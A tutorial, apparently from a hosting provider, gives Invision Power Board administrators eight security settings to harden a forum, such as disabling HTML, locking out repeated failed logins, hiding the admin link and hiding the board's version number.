IPB Tutorial: Security Tips
In this section of the tutorial you will find several tips how to improve the security of your Invision Power Board.
1. Do not allow HTML for your board except for user groups that you can fully trust. When creating a forum you can choose not to allow HTML code to be posted in various sections for the board. You can disallow HTML code in all of the areas listed below:
To disable HTML in signatures and the about me section for members go to System tab-> System Settings -> Members tab -> User Profiles.
To disable HTML in personal messages between users go to System tab -> System Settings -> Members tab -> Personal Message Set-up
To disable the HTML in posts for specific user groups go to Members tab -> Manage User Groups -> Edit for the group -> Global tab
2. For the lost password recovery it is best to use the email random password option.
This option can be altered via the IPBoard admincp -> System -> System Settings -> System Tab -> Security and Privacy.
Note that it is highly advisable to email the new password instead of letting the user enter it manually as it is much less likely that the user account email address is compromised.
3. Setup a limited amount of failed login attempts. If the number is reached the user is locked out of the forum for a set time.
This option can be altered via your the IPBoard admincp -> System -> System Settings -> System Tab -> Security and Privacy -> Brute-force Account Locking section.
The other two options below allows you to define if blocked accounts will be automatically unlocked and if so after how many minutes.
4. Use secure mail form for member to member communication. This way it will not be possible to get the emails of your board users and use them for spam and other fraudulent activities.
You can enable secure form email for member to member communication via IPBoard admincp -> System -> System Settings -> System Tab -> Security and Privacy -> Use secure mail form for member to member mails
5. Remove the admincp link from your board and modify the name of the administrator directory to something else.
The link to the admin panel that is by default included on your forum index can be removed. This is highly advisable along with renaming the admincp folder to something else. The option can be altered via IPBoard admincp -> System -> System Settings -> System Tab -> Security and Privacy -> Remove the ACP link from the board
6. It is highly advisable to manually approve new accounts registration as well as leave the option to verify the registration via email.
This option might not be suitable for very popular forums that have lots of new user registrations on a daily basis. However, for closed communities it is best if you have all new user registrations manually approved by forum administrators. This way you can prevent spam bots and unauthorized users from posting on your forum with 100% success.
The highest possible security is forcing users to first verify the new account registration via the email address they provided upon registering the new account. Once the new account registration is verified via email it is queued for approval via the board administrator. This option can be chosen via IPBoard admincp -> System -> System Settings -> System Tab -> Security and Privacy -> New registration email validation.
You might want to take some time and also adjust the options below to your convenience.
7. Force user login before the board is viewed. This way only registered users can view and post on your online board. Note that in this case guests on your online board won't be able to view any of the forums. The option is available at IPBoard admincp -> System -> System Settings -> System Tab -> Security and Privacy -> Force guests to log in before allowing access to the board
The alternative is to set specific permissions for each forum and thus allow some general purpose forums to be viewable for Guest users. For example you might want to make news and forum rules viewable for everyone so they can check them prior to registering.
To achieve this all you need to do is use the permissions matrix when creating a new forum or category. Do not add permissions for the group that guest users are automatically assigned to. This way none of your forums will be accessible for users that are not registered and logged in except for forums you explicitly add permissions to. It is highly advisable to set only Show Forum and Read Topics permissions in such cases.
8. Do not display the version of IPB you are running. Otherwise it will be much easier to search for possible exploits for the specific version if one is trying to compromise your board.
Displaying the IPBoard version can be turned off via IPBoard admincp -> System -> System Settings -> System Tab -> Security and Privacy -> Privacy section -> Display IPB version on your site.
There are various options you can manage for your IPBoard. Most of the other features that can be a security issue are set to the highest possible security by default. Bear in mind that you should carefully read and understand what each option does prior to making changes in order to avoid any issues with your online board.